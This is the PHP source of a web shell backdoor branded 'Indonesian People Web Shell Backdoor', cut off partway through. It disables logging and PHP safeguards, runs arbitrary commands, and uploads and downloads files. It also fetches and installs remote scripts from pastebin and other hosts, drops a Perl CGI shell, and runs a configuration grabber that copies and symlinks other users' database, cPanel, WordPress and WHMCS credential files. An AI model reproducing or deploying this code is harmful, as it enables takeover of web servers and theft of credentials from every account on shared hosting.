x

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12. $phi = fopen("php.ini","w+");
13. fwrite($phi,"safe_mode = Off
14. disable_functions = NONE
15. safe_mode_gid = OFF
16. open_basedir = OFF ");
17. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
18. @ob_clean();
19. $file = $_GET['file'];
20. header('Content-Description: File Transfer');
21. header('Content-Type: application/octet-stream');
22. header('Content-Disposition: attachment; filename="'.basename($file).'"');
23. header('Expires: 0');
24. header('Cache-Control: must-revalidate');
25. header('Pragma: public');
26. header('Content-Length: ' . filesize($file));
27. readfile($file);
28. exit;
29. }
30. ?>
31. <html>
32. <head>
33. <title>Indonesian People Web Shell Backdoor</title>
34. <link href='http://azzat.wap.mu/favicon.ico' rel='shortcut icon' alt='icon'>
35. <meta name='author' content='AZZATSSINS'>
36. <meta charset="UTF-8">
37. <style type='text/css'>
38. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
39. html {
40. background: #000000;
41. color: #ffffff;
42. font-family: 'Ubuntu';
43. font-size: 13px;
44. width: 100%;
45. }
46. li {
47. display: inline;
48. margin: 5px;
49. padding: 5px;
50. }
51. table, th, td {
52. border-collapse:collapse;
53. font-family: Tahoma, Geneva, sans-serif;
54. background: transparent;
55. font-family: 'Ubuntu';
56. font-size: 13px;
57. }
58. .table_home, .th_home, .td_home {
59. border: 1px solid #ffffff;
60. }
61. th {
62. padding: 10px;
63. }
64. a {
65. color: #ffffff;
66. text-decoration: none;
67. }
68. a:hover {
69. color: gold;
70. text-decoration: underline;
71. }
72. b {
73. color: gold;
74. }
75. input[type=text], input[type=password],input[type=submit] {
76. background: transparent;
77. color: #ffffff;
78. border: 1px solid #ffffff;
79. margin: 5px auto;
80. padding-left: 5px;
81. font-family: 'Ubuntu';
82. font-size: 13px;
83. }
84. textarea {
85. border: 1px solid #ffffff;
86. width: 100%;
87. height: 400px;
88. padding-left: 5px;
89. margin: 10px auto;
90. resize: none;
91. background: transparent;
92. color: #ffffff;
93. font-family: 'Ubuntu';
94. font-size: 13px;
95. }
96. select {
97. width: 152px;
98. background: #000000;
99. color: lime;
100. border: 1px solid #ffffff;
101. margin: 5px auto;
102. padding-left: 5px;
103. font-family: 'Ubuntu';
104. font-size: 13px;
105. }
106. option:hover {
107. background: lime;
108. color: #000000;
109. }
110. </style>
111. </head>
112. <?php
113. function w($dir,$perm) {
114. if(!is_writable($dir)) {
115. return "<font color=red>".$perm."</font>";
116. } else {
117. return "<font color=lime>".$perm."</font>";
118. }
119. }
120. function r($dir,$perm) {
121. if(!is_readable($dir)) {
122. return "<font color=red>".$perm."</font>";
123. } else {
124. return "<font color=lime>".$perm."</font>";
125. }
126. }
127. function exe($cmd) {
128. if(function_exists('system')) {
129. @ob_start();
130. @system($cmd);
131. $buff = @ob_get_contents();
132. @ob_end_clean();
133. return $buff;
134. } elseif(function_exists('exec')) {
135. @exec($cmd,$results);
136. $buff = "";
137. foreach($results as $result) {
138. $buff .= $result;
139. } return $buff;
140. } elseif(function_exists('passthru')) {
141. @ob_start();
142. @passthru($cmd);
143. $buff = @ob_get_contents();
144. @ob_end_clean();
145. return $buff;
146. } elseif(function_exists('shell_exec')) {
147. $buff = @shell_exec($cmd);
148. return $buff;
149. }
150. }
151. function perms($file){
152. $perms = fileperms($file);
153. if (($perms & 0xC000) == 0xC000) {
154. // Socket
155. $info = 's';
156. } elseif (($perms & 0xA000) == 0xA000) {
157. // Symbolic Link
158. $info = 'l';
159. } elseif (($perms & 0x8000) == 0x8000) {
160. // Regular
161. $info = '-';
162. } elseif (($perms & 0x6000) == 0x6000) {
163. // Block special
164. $info = 'b';
165. } elseif (($perms & 0x4000) == 0x4000) {
166. // Directory
167. $info = 'd';
168. } elseif (($perms & 0x2000) == 0x2000) {
169. // Character special
170. $info = 'c';
171. } elseif (($perms & 0x1000) == 0x1000) {
172. // FIFO pipe
173. $info = 'p';
174. } else {
175. // Unknown
176. $info = 'u';
177. }
178. // Owner
179. $info .= (($perms & 0x0100) ? 'r' : '-');
180. $info .= (($perms & 0x0080) ? 'w' : '-');
181. $info .= (($perms & 0x0040) ?
182. (($perms & 0x0800) ? 's' : 'x' ) :
183. (($perms & 0x0800) ? 'S' : '-'));
184. // Group
185. $info .= (($perms & 0x0020) ? 'r' : '-');
186. $info .= (($perms & 0x0010) ? 'w' : '-');
187. $info .= (($perms & 0x0008) ?
188. (($perms & 0x0400) ? 's' : 'x' ) :
189. (($perms & 0x0400) ? 'S' : '-'));
190. // World
191. $info .= (($perms & 0x0004) ? 'r' : '-');
192. $info .= (($perms & 0x0002) ? 'w' : '-');
193. $info .= (($perms & 0x0001) ?
194. (($perms & 0x0200) ? 't' : 'x' ) :
195. (($perms & 0x0200) ? 'T' : '-'));
196. return $info;
197. }
198. function hdd($s) {
199. if($s >= 1073741824)
200. return sprintf('%1.2f',$s / 1073741824 ).' GB';
201. elseif($s >= 1048576)
202. return sprintf('%1.2f',$s / 1048576 ) .' MB';
203. elseif($s >= 1024)
204. return sprintf('%1.2f',$s / 1024 ) .' KB';
205. else
206. return $s .' B';
207. }
208. function ambilKata($param, $kata1, $kata2){
209. if(strpos($param, $kata1) === FALSE) return FALSE;
210. if(strpos($param, $kata2) === FALSE) return FALSE;
211. $start = strpos($param, $kata1) + strlen($kata1);
212. $end = strpos($param, $kata2, $start);
213. $return = substr($param, $start, $end - $start);
214. return $return;
215. }
216. function getsource($url) {
217. $curl = curl_init($url);
218. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
219. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
220. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
221. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
222. $content = curl_exec($curl);
223. curl_close($curl);
224. return $content;
225. }
226.  
227. if(get_magic_quotes_gpc()) {
228. function azzatssinsx($array) {
229. return is_array($array) ? array_map('azzatssinsx', $array) : stripslashes($array);
230. }
231. $_POST = azzatssinsx($_POST);
232. $_COOKIE = azzatssinsx($_COOKIE);
233. }
234.  
235. if(isset($_GET['dir'])) {
236. $dir = $_GET['dir'];
237. chdir($dir);
238. } else {
239. $dir = getcwd();
240. }
241. $kernel = php_uname();
242. $ip = gethostbyname($_SERVER['HTTP_HOST']);
243. $dir = str_replace("\\","/",$dir);
244. $scdir = explode("/", $dir);
245. $ds = @ini_get("disable_functions");
246. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
247. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
248. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
249. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
250. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
251. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
252. if(!function_exists('posix_getegid')) {
253. $user = @get_current_user();
254. $uid = @getmyuid();
255. $gid = @getmygid();
256. $group = "?";
257. } else {
258. $uid = @posix_getpwuid(posix_geteuid());
259. $gid = @posix_getgrgid(posix_getegid());
260. $user = $uid['name'];
261. $uid = $uid['uid'];
262. $group = $gid['name'];
263. $gid = $gid['gid'];
264. }
265.  
266. if($_GET['server'] == 'info') {
267. echo "System: <font color=lime>".$kernel."</font><br>";
268. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
269. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
270. echo"Config File: "; if(is_readable("/etc/named.conf")){
271.  
272. echo '[<font color=lime>/etc/named.conf</font>] ';
273.  
274. }else{
275.  
276. echo '[<font color=red>/etc/named.conf</font>] ';
277.  
278. }
279.  
280. if(is_readable("/etc/passwd")){
281.  
282. echo '[<font color=lime>/etc/passwd</font>] ';
283.  
284. }else{
285.  
286. echo '[<font color=red>/etc/passwd</font>] ';
287.  
288. }
289.  
290. if(is_readable("/etc/valiases")){
291.  
292. echo '[<font color=lime>/etc/valiases</font>] ';
293. }else{
294.  
295. echo '[<font color=red>/etc/valiases</font>] ';
296.  
297. }
298.  
299. if(is_readable("/var/named")){
300.  
301. echo '[<font color=lime>/var/named</font>] ';
302. }else{
303.  
304. echo '[<font color=red>/var/named</font>] ';
305.  
306. }
307. echo "<br>Disable Functions: $show_ds<br>";
308. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
309. }
310. echo "Current DIR: ";
311. foreach($scdir as $c_dir => $cdir) {
312. echo "<a href='?dir=";
313. for($i = 0; $i <= $c_dir; $i++) {
314. echo $scdir[$i];
315. if($i != $c_dir) {
316. echo "/";
317. }
318. }
319. echo "'>$cdir</a>/";
320. }
321. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
322. echo "<center></fieldset>";
323. if($_POST['upload']) {
324. if($_POST['tipe_upload'] == 'biasa') {
325. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
326. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
327. } else {
328. $act = "<font color=red>failed to upload file</font>";
329. }
330. } else {
331. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
332. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
333. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
334. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
335. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
336. } else {
337. $act = "<font color=red>failed to upload file</font>";
338. }
339. } else {
340. $act = "<font color=red>failed to upload file</font>";
341. }
342. }
343. }
344. echo "<form method='post' enctype='multipart/form-data'>
345. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
346. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
347. <input type='file' name='ix_file'>
348. <input type='submit' value='upload' name='upload'>
349. </form>";
350. echo $act;
351. echo "</fieldset></center><br>";
352. echo "<center>";
353. echo "<fieldset><ul><b>";
354. echo "<li>[ <a href='?'>HOME</a> ]</li>";
355. echo "<li>[ <a href='?server=info'>SERVER INFO</a> ]</li>";
356. echo "<li>[ <a href='?dir=$dir&do=whmcs'>WHMCS DECODER</a> ]</li>";
357. echo "<li>[ <a href='?whmcs=killer'>WHMCS KILLER</a> ]</li>";
358. echo "<li>[ <a href='?whmcs=remote'>WHMCS REMOTE</a> ]</li>";
359. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>AUTO MASS</a> ]</li>";
360. echo "<li>[ <a href='?config=grabber'>CONFIGS</a> ]</li>";
361. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
362. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPFTP CRACK</a> ]</li>";
363. echo "<li>[ <a href='?dir=$dir&do=mirror'>MIRROR</a> ]</li>";
364. echo "<li>[ <a href='?dir=$dir&do=cgi'>PERL5HELL</a> ]</li>";
365. echo "<li>[ <a href='?mysql=connect'>MYSQL</a> ]</li><br>";
366. echo "<li>[ <a href='?symbolic=link'>SYMLINK</a> ]</li>";
367. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>CHANGE USER</a> ]</li>";
368. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
369. echo "</b></ul></fieldset>";
370. echo "</center>";
371. echo "<br><fieldset>";
372. echo "<form method='post'>
373. <font style='text-decoration: underline;'>Command : </font>
374. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='azx' value='>>'>
375. </form> ";
376. if(isset($_POST['azx']))
377. {
378.  
379. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
380. $cmd = $_POST['cmd'];
381. if($cmd == "")
382. {
383.  
384. echo "Please Insert Command!";
385. }
386.  
387. elseif(isset($cmd))
388. {
389. $output = exe($cmd);
390. echo $output; }
391. echo'</pre></div><br><br>';
392. }
393. echo "</fieldset><br>";
394. if($_GET['whmcs'] == 'killer') {
395. echo'<form method="post">
396. <center>
397. <br><u>Input WHMCS configuration.php</u><br><textarea style="color:red;background-color:#000000" cols="60" name="azztssns" rows="20"></textarea><br><input style="color:red;background-color:#000000" name="conf" size="10"
398. value="Fuck it!!!" type="submit">
399. <br/><br/></form></center>';
400. if ($_POST['conf']) {
401. $configuration = $_POST['azztssns'];
402. file_put_contents("configuration.php",$configuration,FILE_APPEND);
403. $scr = file_get_contents("http://pastebin.com/raw/31kP3Dp8");
404. $fel = fopen("wk.php", "w");
405. fwrite($fel, $scr);
406. system('wget -O wk.php http://pastebin.com/raw/31kP3Dp8');
407. echo'<meta http-equiv="Refresh" content= "0; url=wk.php">';
408. }
409. }
410. if($_GET['whmcs'] == 'remote') {
411. echo'<meta http-equiv="Refresh" content= "0; url=http://whmremote.us.to">';
412. }
413. if($_GET['do'] == 'cgi') {
414. $cgi_dir = mkdir('azx', 0755);
415. $file_cgi = "azx/cgi.pl";
416. $isi_htcgi = "AddHandler cgi-script .pl";
417. $htcgi = fopen(".htaccess", "w");
418. $cgi_script = file_get_contents("http:/x-x-x.yn.lt/pl.css");
419. $cgi = fopen($file_cgi, "w");
420. fwrite($cgi, $cgi_script);
421. fwrite($htcgi, $isi_htcgi);
422. chmod($file_cgi, 0755);
423. system('wget -O azx/cgi.pl www.x-x-x.yn.lt/pl.css');system('chmod 0755 cgi.pl');
424. echo'<meta http-equiv="Refresh" content= "0; url=azx/cgi.pl">';
425. }
426. if($_GET['mysql']=="connect"){
427. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
428. function adminer($url, $isi) {
429. $fp = fopen($isi, "w");
430. $ch = curl_init();
431. curl_setopt($ch, CURLOPT_URL, $url);
432. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
433. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
434. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
435. curl_setopt($ch, CURLOPT_FILE, $fp);
436. return curl_exec($ch);
437. curl_close($ch);
438. fclose($fp);
439. ob_flush();
440. flush();
441. }
442. if(file_exists('mysql.php')) {
443. echo "<center><font color=lime><a href='mysql.php' target='_blank'>KLICK DI SINI</a></font></center>";
444. } else {
445. if(adminer("http://pastebin.com/raw/hN2nDPuH","mysql.php")) {
446. echo "<center><font color=lime><a href='mysql.php' target='_blank'>-> KLICK DI SINI <-</a></font></center>";
447. } else {
448. echo "<center><font color=red>gagal buat file adminer</font></center>";
449. }
450. }
451. }
452. if($_GET['config']=="grabber"){
453. @error_reporting(0);
454. @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
455. echo'<center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS CYBERSERKERS</a></b></i></div><br>
456. <form method="post">
457. <center>
458. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
459. $uSr=file("/etc/passwd");
460. foreach($uSr as $usrr)
461. {
462. $str=explode(":",$usrr);
463. echo $str[0]."\n";
464. }
465. echo system('ls /var/mail');
466. echo system('ls /home');
467.  
468. echo'</textarea><br>
469. Home :
470. <select name="home">
471. <option title="home" value="home">home</option>
472. <option title="home1" value="home1">home1</option>
473. <option title="home2" value="home2">home2</option>
474. <option title="home3" value="home3">home3</option>
475. <option title="home4" value="home4">home4</option>
476. <option title="home5" value="home5">home5</option>
477. <option title="home6" value="home6">home6</option>
478. <option title="home7" value="home7">home7</option>
479. <option title="home8" value="home8">home8</option>
480. <option title="home9" value="home9">home9</option>
481. <option title="home10" value="home10">home10</option>
482. </select><br>
483. .htaccess :
484. <select name="azztssns">
485. <option title="biasa" value="Options Indexes FollowSymLinks
486. DirectoryIndex azzatssins.cyberserkers
487. AddType txt .php
488. AddHandler txt .php">Apache 1</option>
489. <option title="Apache" value="Options all
490. Options +Indexes
491. Options +FollowSymLinks
492. DirectoryIndex azzatssins.cyberserkers
493. AddType text/plain .php
494. AddHandler server-parsed .php
495. AddType text/plain .html
496. AddHandler txt .html
497. Require None
498. Satisfy Any">Apache 2</option>
499. <option title="Litespeed" value="
500. Options +FollowSymLinks
501. DirectoryIndex azzatssins.cyberserkers
502. RemoveHandler .php
503. AddType application/octet-stream .php ">Litespeed</option>
504. </select>
505. <input style="color:red;background-color:#000000" name="conf" size="10"
506. value="Fuck it!!!" type="submit">
507. <br/><br/></form>';
508. if ($_POST['conf']) {
509. $home = $_POST['home'];
510. $folfig = $home;
511. @mkdir($folfig, 0755);
512. @chdir($folfig);
513. $htaccess = $_POST['azztssns'];
514. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
515. $passwd=explode("\n",$_POST["passwd"]);
516. foreach($passwd as $pwd){ $user=trim($pwd);
517. symlink('/','000~ROOT~000');
518. copy('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
519. symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
520. copy('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
521. symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
522. copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
523. symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
524. symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ WHMCS.txt');
525. copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
526. copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
527. copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
528. copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
529. copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
530. copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
531. copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
532. copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
533. copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
534. copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
535. copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
536. copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
537. copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
538. copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
539. copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
540. copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
541. copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
542. copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
543. copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
544. copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
545. copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
546. copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
547. copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
548. copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
549. copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
550. copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
551. copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
552. copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
553. copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
554. copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
555. copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
556. copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
557. copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
558. copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
559. copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
560. copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
561. copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
562. copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
563. copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
564. copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
565. copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
566. copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
567. copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
568. copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
569. copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
570. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
571. copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
572. copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
573.  
574. copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
575. copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
576. copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
577. copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
578. copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
579. copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
580. copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
581. copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
582. copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
583. copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
584. copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
585. copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
586. copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
587. copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
588. symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
589. symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
590. symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
591. symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
592. symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
593. symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
594. symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
595. symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
596. symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
597. symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
598. symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
599. symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
600. symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
601. symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
602. symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
603. symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
604. symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
605. symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
606. symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
607. symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
608. symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
609. symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
610. symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
611. symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
612. symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
613. symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
614. symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
615. symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
616. symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
617. symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
618. symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
619. symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
620. symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
621. symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
622. symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
623. symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
624. symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
625. symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
626. symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
627. symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
628. symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
629. symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
630. symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
631. symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
632. symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
633. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
634. symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
635. symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
636.  
637. symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
638. symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
639. symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
